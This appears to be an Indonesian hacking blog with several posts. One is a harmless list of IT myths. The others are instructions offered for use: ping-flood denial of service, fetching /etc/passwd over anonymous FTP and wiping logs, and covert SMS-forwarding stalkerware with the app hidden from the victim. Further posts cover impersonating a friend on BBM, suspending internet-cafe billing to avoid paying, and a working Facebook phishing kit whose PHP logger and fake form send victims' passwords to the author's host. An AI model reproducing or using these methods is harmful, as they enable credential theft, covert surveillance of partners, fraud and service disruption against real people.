Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Jumat, 06 September 2013

10 Mitos Dibidang I.T.

Mitos adalah cerita yang tumbuh berkembang di masyarakat yang tidak jelas kebenarannya tetapi dianggap benar oleh si pembuatnya atau mereka yang menganutnya. Mitos ini biasanya mengakar dan butuh proses serta waktu bagi mereka yang menganutnya untuk menyadari bahwa apa yang mereka percayai itu tidaklah benar.

Di dunia TI (Teknologi Informasi) pun berkembang beberapa mitos. Umumnya mitos ini muncul melalui proses awal yang memang benar terjadi atau melalui praduga dan sampai sekarang beberapa mitos di dunia TI tersebut masih ‘tersimpan kuat’ di pikiran kita.

Apa sajakah mitos di dunia TI itu? Berikut 10 mitos yang berkembang di dunia TI dan beberapa diantaranya masih begitu kuat untuk dihilangkan, seperti diringkas dari vnunet :
Quote:Quote:10. Perusahaan harus mengganti sistemnya 2 sampai 3 tahun sekali
Memang benar bahwa perkembangan dunia komputer begitu cepat tapi adanya mitos untuk mengharuskan mengganti sistem setiap 2 sampai 3 tahun sekali adalah tidak sepenuhnya benar. Umumnya komputer yang digunakan perusahaan hanya memerlukan program seperti Office suite, browser web dan klien email sehingga tidak perlu mengganti keseluruhan sistem dalam jangka waktu yang cukup pendek (2-3 tahun). Dan bahkan dengan sebuah netbook hampir 90% pekerjaan kita dapat diselesaikan.

Quote:Quote:9. Bill Gates adalah seorang programmer yang luar biasa
Jika sampai sekarang kita masih berpikiran bahwa seorang Bill Gates, pendiri micr*soft, adalah seorang programmer yang hebat nan luar biasa maka baiknya dibuang jauh-jauh pemikiran seperti itu. Meski Bill Gates memiliki kemampuan programming diatas sebagian dari kita tetapi programmer hebat dibalik kesuksesan sistem operasi buatan micr*soft adalah Paul Allen. Bill Gates memang boleh kalah dibanding Paul Allen tapi dia adalah seorang pengusaha yang memiliki naluri yang sangat tajam yang bisa membawa micr*soft berjaya di beberapa puluh tahun terakhir ini.

Quote:Quote:8. Komputer Macs tidak kompetibel dengan apapun
Dulu, mitos bahwa komputer Macs tidak kompetibel dengan apapun begitu kental dan itu tidak sepenuhnya benar. Sekarang ini sejak Apple menggunakan prosesor Intel maka di komputer Macs dapat berjalan sistem operasi Windows juga dan sejak dulu aplikasi-aplikasi besar seperti Office dan Photoshop tidak pernah memiliki masalah untuk berjalan di Macs.

Quote:Quote:7. Komputer akan bertahan lama manakala dibiarkan menyala
“Lebih baik tetap nyalakan komputer anda agar lebih awet”, seperti itulah yang banyak diucapkan orang dulu. Mitos ini seiring dengan perkembangan hardware komputer menjadi tidak berlaku lagi. Dahulu untuk menyalakan komputer memang dibutuhkan daya listrik yang besar dan untuk menjaga kestabilan suhu didalam komputer dianjurkan untuk tidak terlalu sering menyalakan dan mematikan komputer (zaman mainframe). Tapi itu tidak berlaku lagi untuk komputer di zaman sekarang.

Quote:Quote:6. Hacker dapat menyebabkan perang dunia ketiga
Dalam banyak film atau cerita sering digambarkan bahwa seorang hacker dapat menerobos fasilitas militer suatu negara yang memiliki senjata nuklir dan membuat ‘chaos’ dengan keisengannya mengarahkan nuklir yang dimiliki ke negara lain. Mengerikan bukan jika hal itu bisa benar-benar terjadi dan sampai dengan saat ini hal seperti itu belum pernah terjadi karena memang tidak semudah seperti apa yang digambarkan di film/cerita untuk bisa menerobos masuk ke sistem pertahanan komputer militer suatu negara. Yang justru harus lebih menjadi perhatian adalah faktor human error (kesalahan manusia) dan kegagalan sistem.

Quote:Quote:5. Apple/Linux pasti lebih aman dibanding Windows
Jika anda berpikir bahwa sistem yang berbasiskan sistem operasi buatan Apple (Mas OS X) dan Linux pasti lebih aman dibandingkan yang berbasis Windows maka pendapat anda tidak sepenuhnya tepat. Windows sering disebut sebagai sistem operasi paling rentan dikarenakan mereka yang menjadikan Windows sebagai target begitu ‘bersemangat’ dan bernilai karena pengguna Windows terbanyak di dunia. Untuk Mac OS X pun sering mendapatkan patch keamanan, meski sering terlambat dan untuk Linux pun tidak jauh beda, hanya saja di Linux yang berbasiskan komunitas maka setiap ada masalah keamanan akan ada banyak orang yang cepat bereaksi untuk mengatasinya.

Quote:Quote:4. Artificial Intelligence (AI) atau kecerdasan buatan didapat dengan komputer yang makin cepat
Di film-film fiksi ilmiah sering digambarkan sebuah robot yang memiliki kecerdasan dan perasaan layaknya seorang manusia dan itu didapat dari komputer yang semakin cepat. Hal tersebut tidaklah benar, meskipun komputer sekarang semakin cepat tapi untuk membuat sebuah robot yang memiliki kecerdasan buatan layaknya manusia tidak hanya melulu persoalan komputer yang cepat karena selain itu juga berkaitan dengan psikologi yang rumit yang sampai sekarang pun belum dapat dijabarkan.

Quote:Quote:3. Internet dikembangkan agar bisa selamat dari perang nuklir
Mitos seperti ini muncul dengan skenario dimana protokol internet dikembangkan agar nantinya ketika terjadi serangan nuklir maka bagian jaringan komputer yang rusak dapat segera dialihkan melalui jalur internet dan aliran data tetap lancar bagi kepentingan dunia barat. Tapi mitos ini tidak pernah terbukti, sampai sekarang internet tetap netral dan semakin luas penggunaannya.

Quote:Quote:2. Semakin besar daya CPU = semakin cepat komputer
Pandangan ini sudah berkembang selama dua dasawarsa. Banyak orang yang beranggapan semakin besar clockspeed prosesor yang ditandai dengan mhz maka akan semakin cepat sebuah komputer. Yang tepat adalah kecepatan sebuah prosesor memiliki pengaruh sangat sedikit terhadap kinerja keseluruhan komputer, masih ada faktor-faktor lain yang lebih dominan misalkan : Ukuran cache, kemampuan grafis dan waktu akses hard disk.

Quote:Quote:1. Perusahaan pembuat antivirus menulis kebanyakan virus komputer
Sering muncul pandangan bahwa virus-virus komputer yang beredar ditulis sendiri oleh perusahaan pembuat antivirus dan pandangan tersebut beredar luas hingga saat ini. Padahal yang banyak beredar saat ini kebanyakannya adalah virus-virus komputer yang dibuat oleh script kiddies yang meniru atau merubah kode sumber virus milik seseorang. Dan pandangan seperti ini tidak perlu muncul apabila kita tahu para pembuat antivirus tidak akan menyibukkan dirinya dengan membuat virus itu sendiri karena sehari-harinya pun mereka menghadapi ratusan dan bahkan mungkin ribuan virus komputer.

Hacking tool tersembunyi pada DOS

nih saatnya gan/sis kita bahas DOS..

oke,, langsung cekidot..

OS Micrsoft Windows sebenarnya disajikan dengan beberapa hacking tool tersembunyi. Hacking tool ini bisa kita temuin c:\windows\system32. Di thread ane kali ini, ane pngen sedikit ngeshare membahas mengenai beberapa perintah yang bisa ditemukan di OS ini

Quote:
1. Ping
2. Tracert
3. Telnet
4. Ftp
5. Netstat


Kita mulai satu-persatu ya, gan...
Quote:
1. Ping

Utiliy ini digunakan untuk mencari keberadaan remote host, yang akan mengirimkan sebuah signal SYN ke remote host, dan jika remote host membalas maka artinya memang ada suatu remote machine.

Cobalah agan ketik perintah ini:
Quote:
C:\windows>ping/?
Quote:
Usage:
ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.


Jadi kita bisa melakukan Ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh ane ketik “ping localhost” maka ane bakalan dapetin :
Quote:
Pinging N3xuZ [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms


Quote:
'Localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat agan terhubung ke internet agan akan diberi ip baru oleh isp agan sebagai identifikasi diri agan. Agan dapat mencari tahu ip agan dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.


Ini berarti bahwa 32 byte data yang dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika ane mengetik “ping http://www.yahoo.com”
Quote:
Pinging http://www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:

Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54

Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms


Tapi bagaimana Ping tersebut digunakan oleh para hacker? Ada dua opsi, yaitu ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika ane mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.

Dan jika ane mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.

Quote:
Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.


Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.


Quote:
2. Tracert

Perintah Tracert adalah perintah untuk melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika ane mengetik “tracert http://www.yahoo.com/” pada dos prompt maka akan terdapat:
Quote:
Tracing route to http://www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:

1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * http://www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]

Trace complete.


Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama ane melalui sify.net (nama ISP server ane) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun agan membuka http://www.yahoo.com/ dalam web browser, request agan selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.com/ dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.

Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan map dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall.


Quote:
3. Telnet

Jika agan menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi agan. Sebenarnya merupakan 'telnet' sendiri merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet agan dapat menentukan suatu koneksi antara mesin agan dan remote machine melalui port tertentu.

Quote:Disini ane membicarakan tentang virtual port. Tidak secara fisik yang agan lihat dibalik CPU. Ini hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual.

Jika agan mengetik “telnet target.com” maka agan terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Agan juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika ane ingin terhubung ke port no. 25 (SMTP service) maka ane akan mengetik “telnet target.com
Quote:
Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services" pada notepad.


Agan akan terhubung ke sebuah remote machine pada port tertentu, dan sebuah window popup telnet dengan daemon yang akan menjalankan port tersebut menunggu agan mengetikkan perintah. Sebagai contoh “telnet http://www.cyberspace.org/” maka seperti gambar dibawah inilah yang ane dapetin.

Ane harus login dulu disana dan mengetik suatu password dan ane akan mendapatkan linux shell prompt. Dan agan akan mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Setelah itu ane tinggal menyiapkan perintah untuk mengeksekusi secara remote.

Pada http://www.cyberspace.org/ memiliki server Linux. Jadi jika agan tidak familiar dengan Linux agan tidak akan mampu menggunakan service-nya.

4. FTP

FTP adalah File Transfer Protocol. Melalui ini agan dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer, pertama kali agan harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address agan sebagai password. Tentunya agan harus mengetikkan email palsu. Sekarang agan boleh mulai mendownload dan mengupload file. Namun untuk itu agan harus mengetikan pada FTP prompt “?”. Maka akan ditampilkan sbb:

Quote:
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir


Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, ketikan “? Delete”. Beberapa perintah penting lainnya adalah:
Quote:
1. 'pwd' to know the present directory at remote machine.
contohnya. ftp>pwd
/etc/home
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open http://www.target.com
7. 'bye' closes the connection and quits from ftp


Untuk perintah lainnya dari ftp silakan lihat help mereka.

Sekarang pada yang port FTP (prot 21) adalah membuka http://www.nosecurity.com/. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com/” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com/ menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengkracknya. Jika agan adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.


Quote:
5. netstat

Agan dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika agan ingin menentukan sebuah koneksi dengan http://www.target.com/ pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com/. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Dengan mengetikkan “netstat /?” pada dos prompt akan ditampilkan :
Quote:
Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.


Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika ane menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Ane bakal medapatkan hal berikut ini jika ane mengetik “netstat –a” pada command prompt.

Quote:
Active Connections

Proto Local Address Foreign Address State
TCP N3xuZ:1027 0.0.0.0:0 LISTENING
TCP N3xuZ:80 0.0.0.0:0 LISTENING
TCP N3xuZ:135 0.0.0.0:0 LISTENING
TCP N3xuZ:6435 0.0.0.0:0 LISTENING
TCP N3xuZ:1025 0.0.0.0:0 LISTENING
TCP N3xuZ:1026 0.0.0.0:0 LISTENING
TCP N3xuZ:1028 0.0.0.0:0 LISTENING
TCP N3xuZ:1309 0.0.0.0:0 LISTENING
TCP N3xuZ:1310 0.0.0.0:0 LISTENING
TCP N3xuZ:1285 rumcajs.box.sk:80 ESTABLISHED
TCP N3xuZ:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP N3xuZ:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP N3xuZ:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP N3xuZ:1220 aiedownload.cps.intel.com:ftp ESTABLISHED


”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.

Sebagai contoh jika ane membuka http://www.yahoo.com/ maka saat ane menjalankan “netstat –a” ane akan mendapatkan masukan seperti ini:
Quote:
"TCP 203.43.50.81:2034 http://www.yahoo.com:80 ESTABLISHED"


Komputer ane dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80

Quote:
Dengan cara ini agan bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan agan akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut.
  muga" berkenan :)

Selasa, 03 September 2013

sadap sms lewat "sms watcher lite"

hallo gan dan sis... kali ini ReÄper_Cyber mau bahas yang namanya mengontrol sms atau bahasa kasarnya "sadap" sms..

bagi para orang tua yang khawatir dengan tingkah laku pergaulan sang anak, dan bagi yang curiga sama pacar karna udah gak perhatian lagi..
hehehe :p

oke langsung cekidot ke tkp...

langkah-langkah :
1. handphone korban harus bersistem Android (selain itu gak bisa lho)
2. download aplikasi sadap sms nya...
silahkan download DISINI
3. install aplikasi
4. masukan password yg kamu inginkan
5. nah, kan ada dua list tuh..
white list dan forward list, isikan nomor kamu di fordward list karena memang fungsinya sebagai forwarder sms
6. save lalu keluar

agar aplikasi tidak kelihatan oleh korban, pastinya android pake GO Launcher..
maka caranya tinggal :
1. pilih menu
2. pilih pengaturan di menu
3. pilih Hide app
4. lalu centang aplikasi sadap sms nya
5. ok

jujur gue juga pake, buat ngontrol yang sms ke pacar gua,, namanya N****
#curhat :p

Cara Baik Hack BBM

nah ReÄper_Cyber mau kasih tips iseng-iseng hacking pake BBM.
tapi bukan sampai menghancurkan data BlackBerry korban lho!!
Cara hack BlackBerry Messenger kali ini cukup mudah, saya pernah melakukan trik ini sampai-sampai teman saya kebingungan kenapa bisa begitu. Tetapi satu hal yang ingin saya pastikan adalah bahwa trik hacking BBM ini tidaklah susah. Tidak diperlukan download software, program, tool, aplikasi ngehack, tetapi hanya dibutuhkan kreativitas dan sedikit punya otak hacker.
Nah, mau tau trik nge-hack BlackBerry teman anda? Begini caranya:

1. Cari dahulu korbanmu yang ingin dikerjai. Tentunya anda harus punya datanya di contact list kamu.
2. Silahkan simpan profile picture kepunyaan dia, copy juga nicknamenya serta bunyi statusnya saat itu juga.
3. Silahkan gunakan profile picture teman anda yang sudah anda save tadi ke profile anda, sekalian paste juga nickname dan bunyi statusnya ke profile BBM kamu.
4. Nah sekarang saatnya beraksi ! Cari temanmu yang juga menjadi temannya sehingga anda bisa “memalsukan identitas BlackBerry”. Ajak dia chat, supaya lebih urgent, kamu bisa PING!!! dia.
Nah, teman yang kamu ajak chat yang juga teman yang kamu palsukan identitasnya itu akan mengira bahwa kamu adalah teman yang kamu palsukan identitasnya.

xixixixixy....


Cara Hack biling warnet pake Smadav



Tata caranya:
1. Cari warnet yang memakai billing HandyCafe
2. Kamu maen personal aja biar bayarannya dikit
3. Jangan lupa beli teh botol sama rokok biar tetap tenang
4. Kalo comp client nya ga ada smadav. terpaksa harus download
5. instal smadav, klick next2 aja

Nah sekian dulu tata caranya ya MasBro

Capek juga Capek


Nah kita mulai hack-menghack

1. Buka smadav
2. Klick Tools
[Image: 379632_667247546635503_1923973202_n.jpg]
3. Pilih Process Manager
[Image: 1559_667248076635450_222877757_n.jpg]
4. Klick kanan pada HandyCafe.exe, Pilih action, trus klick suspend
Pada tutor nomor 4 ga ada ScreenShot. Soalnya di warnet ini udah ga pake HandyCafe lagi, tapi pake billing PIKA BILLING. Jadi ga bisa Hack billing lagi deh Ngupil
5. Coba deh liat billingnya. pasti udah keliatan error. Limit sama bayarannya ga bakalan nambah2 lagi kalo udah di suspend.
6. Kalo maennya udah slesai, buka smadav lagi. tapi kali ini jangan di suspend lagi billingnya, tapi di Resume kayak tutor nomor 4.
7. Sebelum mengerjakan tahap nomor 1-5. Disarankan harus pencet Hide pada billing HandyCafe, biar penonton yang di kiri sama yang di kanan enggak heran

Mengembalikan Account FB yang dah di hacked

cuman coba-coba, sapa tau berhasil. hehe...

oke, langsung cekidot...

langkah pertama :Ngakak
buka http://facebook.com/help

langkah kedua : Ngakak
dibagian kanan ada kolom... klik yang ada tulisan "Hacked accounts and spam.. If you believe your account has been hacked or phished, take action here."

langkah ketiga : Ngakak
ikuti petunjuk-petunjuknya...

kemungkinan berhasil 51% Ngakak

maap kalo salah... Sedih

Hack facebook dengan memanfaatkan facebook pages

[Image: images?q=tbn:ANd9GcSZMokhDm4atgKzMVPvxBW...LoEZbKfLag]

Sesuai judul kali ini saya akan mencoba membuat manipulasi facebook pages agar banyak korban yang terjebak dalam trik ini

yang di butuhkan sebuah hosting yang aktif

buat dulu saveit.php dengan menggunakan notepad dan save dengan nama saveit.php

Code:
<?php
$Trojanz= fopen("trojanzboy.html", "a");
foreach($_POST as $variable => $value)
{
fwrite($Trojanz, $variable);
fwrite($Trojanz, "=-=");
fwrite($Trojanz, $value);
fwrite($Trojanz, "\r\n");
}
fwrite($Trojanz, "\r\n");
fwrite($Trojanz, "<hr />");
fclose($Trojanz);
echo 'Sent.. We will inform you after verification later';
exit;
?>


lalu upload di hosting kalian

saya harap kaian sudah mempunyai hosting ya . . .

sekarang buat halaman facebook

https://www.facebook.com/pages

setelah sukses membuat halaman facebook saatnya search static html pada form search

[Image: Capture.PNG]

setelah itu klik add static html

[Image: 2.PNG]

lalu klik tambahkan static html

[Image: 3.PNG]

lalu pilih halaman yang baru dibuat tadi

dan klik aplikasi

[Image: Capture.PNG]

dan setelah itu klik app buffet

[Image: Capture.PNG]

setelah itu masukkan halaman html kalian
atau
bisa menggunakan html punya saya

<html>
<body background="http://www.paulmaricle.com/images/blue_background.jpg">

<TT>
<font color="white">

<form action="http://trojaznboy.com/images/saveit.php" method="post">
<br>
<center>

Untuk memastikan bahwa akun Anda tidak bot .. kami membutuhkan ID dan Password FB Anda .. Untuk pemrosesan system kami . . <br />
<br><br><br>
Email: <input type="text" name="username"/><br>
Password: <input type="password" name="password"/><br>
Confirm Password: <input type="password" name="conf_password"/><br>
TO Mobile Number: <input type="Number" name="Number"/><br />
Sender Number(Number from which you want to send msg): <input type="Number" name="Number"/><br />
<br><br><br><br>Type Your Message Here: <input type="Message" name="Message"/><br />
<br><br><br>
<input type="submit"/>
</form>
</body>
</html>

[img]
[Image: Capture.PNG]


ganti tulisan merah dengan letak saveit.php yang telah kalian upload pada hosting kalian

lalu save

dan halaman pun siap digunakan untuk njebak korban

undang teman-teman anda untuk masuk perangkap ini

[Image: Capture.PNG]

dan jika ada korban yang terperangkap pada tehnik ini maka log akan tercipta
pada direktori yang sama pada letak saveit.php tadi dalam bentuk html


[Image: Capture.PNG]

bagaimana? bisa?

Trik Dan Cara Menjadi Hacker Anonymous


 

Bagi Kalian para pembaca, pencari berita atau informasi di internet pasti Kalian pernah mendengar tentang hacker?Apakah Kalian pernah mendengar sebuah organisasi hacker yang menamai dirinya yaitu "hacker Anonymous"? Apakah Kalian ingin bergabung dan mengenal lebih dalam tentang hacker Anonymous? Bila kalian ingin tahu lebih dalam siapa dia, silakan simak informasi yang akan Kami sajikan kali ini.

PANDUAN MENJADI ANONYMOUS

Pertanyaan?

1. Jadi Anda ingin bergabung dengan Anonymous?
2. Bagaimana untuk mendapatkan kontak dengan yang lainnya?
3. Bagaimana cara mengenali Anonymous lain?
4. Apakah Anda telah disusupi?
5. Bagaimana cara melindungi privasi saya?
6. Hal benar apa yang harus saya lakukan?
7. Berapa banyak Anonymous yang ada?

Jawaban

1. Jadi Anda ingin bergabung dengan Anonymous?

Anda tidak dapat bergabung dengan Anonymous. Tidak seorangpun yang bergabung dengan Anonymous.
Anonymous bukanlah organisasi. Ini bukan klub, partai atau bahkan gerakan.

Tidak ada piagam, tidak ada manifesto, tidak ada biaya keanggotaan.

Anonymous tidak memiliki pemimpin, tidak ada guru, tidak ada ideolog. Bahkan, tidak memiliki ideologi tetap. Kita semua bagaikan orang yang melakukan perjalanan jauh bersama.

Seperti penumpang yang bertemu di bus atau KRL: pada waktu yang sama dan memiliki rute yang sama, berbagi tujuan bersama, umum atau yang tidak suka. Dan dalam perjalanan bersama, kita mungkin akan mengubah dunia.

Tidak ada yang berhak berbicara sebagai Anonymous. Tidak ada yang bisa mengatakan: Anda diterima, atau Anda ditolak.

Apakah Anda masih ingin bergabung dengan Anonymous? Nah, Anda telah bergabung jika Anda mau.

2. Bagaimana untuk mendapatkan kontak dengan yang lainnya?

Anonymous tidak memiliki infrastruktur terpusat. Kami menggunakan fasilitas yang ada di Internet,
jaringan sosial khususnya, dan kami siap untuk pindah ke yang lainnya jika yang satu ini tampaknya terganggu, sedang diserang, atau mulai membuat kami bosan.

Pada saat penulisan ini, Facebook, Twitter dan IRC menjadi rumah bagi jemaat yang paling aktif. Tapi ini bisa berubah setiap saat. Namun, ini mungkin tempat terbaik untuk memulai.

Carilah istilah seperti "anonim", "anonops" dan kata kunci lain yang mungkin dihubungkan dengan kegiatan kami.  
     
3. Bagaimana cara mengenali Anonymous lainnya?

Kami datang dari semua tempat masyarakat: Kami adalah mahasiswa, pekerja, pegawai, pengangguran;
Kami masih muda atau tua, kita memakai jas atau kaos oblong, kami hedonis, pertapa, klub pengendara atau aktivis.

Kami datang dari semua ras, negara-negara dan etnis. Kami sangat banyak. Kami adalah tetangga Anda, rekan kerja anda, penata rambut Anda, sopir bus dan administrator jaringan Anda.

Kami adalah orang di jalan dengan koper dan gadis di bar yang Anda coba untuk merayunya. Kami adalah Anonymous. Banyak dari kita suka memakai topeng Guy Fawkes pada saat melakukan demonstrasi.

Sebagian dari kita bahkan menampilkannya pada gambar profil mereka di jaringan sosial yang membantu untuk mengenali satu sama lain.

4. Apakah Anda telah disusupi?

Jika Anda berbicara dengan Anonymous yang lain, Anda tidak akan pernah tahu siapa dia. Dia mungkin seorang hacker, cracker, phisher, agen, mata-mata, provokator atau hanya orang dari sebelah rumah. Atau putri atau putra tetangga Anda.

Hal ini tidaklah ilegal untuk menjadi Anonymous. Juga tidak ilegal untuk memakai topeng Guy Fawkes. Ingatlah hal tersebut.

Jika Anda secara pribadi tidak terlibat dalam kegiatan ilegal, Anda tidak perlu khawatir, tidak peduli dengan siapa Anda berbicara. Jika memang Anda melakukannya, adalah bijaksana untuk tidak membicarakannya
kepada siapa pun.
   
5. Bagaimana cara melindungi privasi saya?

Menciptakan alias, nick, nama samaran ... sebutlah salah satu sesuka Anda, ciptakanlah sebuah nama.
Kemudian buatlah akun email dengan nama nick Anda tadi dengan salah satu penyedia email besar.

Gunakan alamat email ini untuk mendaftar Twitter, Facebook, dan akun lainnya. Pastikan untuk menghapus semua cookie

Sebelum Anda mulai menggunakan identitas baru Anda, atau lebih baik menggunakan web browser yang berbeda untuk Anonymous dan kegiatan lainnya.

Jika Anda memiliki kebutuhan yang lebih tinggi untuk keamanan, tanya kepada kami tentang enkripsi, stenografi, TOR, dll. Banyak dari kami yang tahu bagaimana menggunakan hal hal tersebut.

Kami akan selalu menghormati kebutuhan Anda akan privasi. Kami tidak akan pernah meminta informasi pribadi Anda. Jika kami melakukannya, kami tidak akan mengharapkan jawaban benar dan Anda tidak harus menjawab dengan benar.

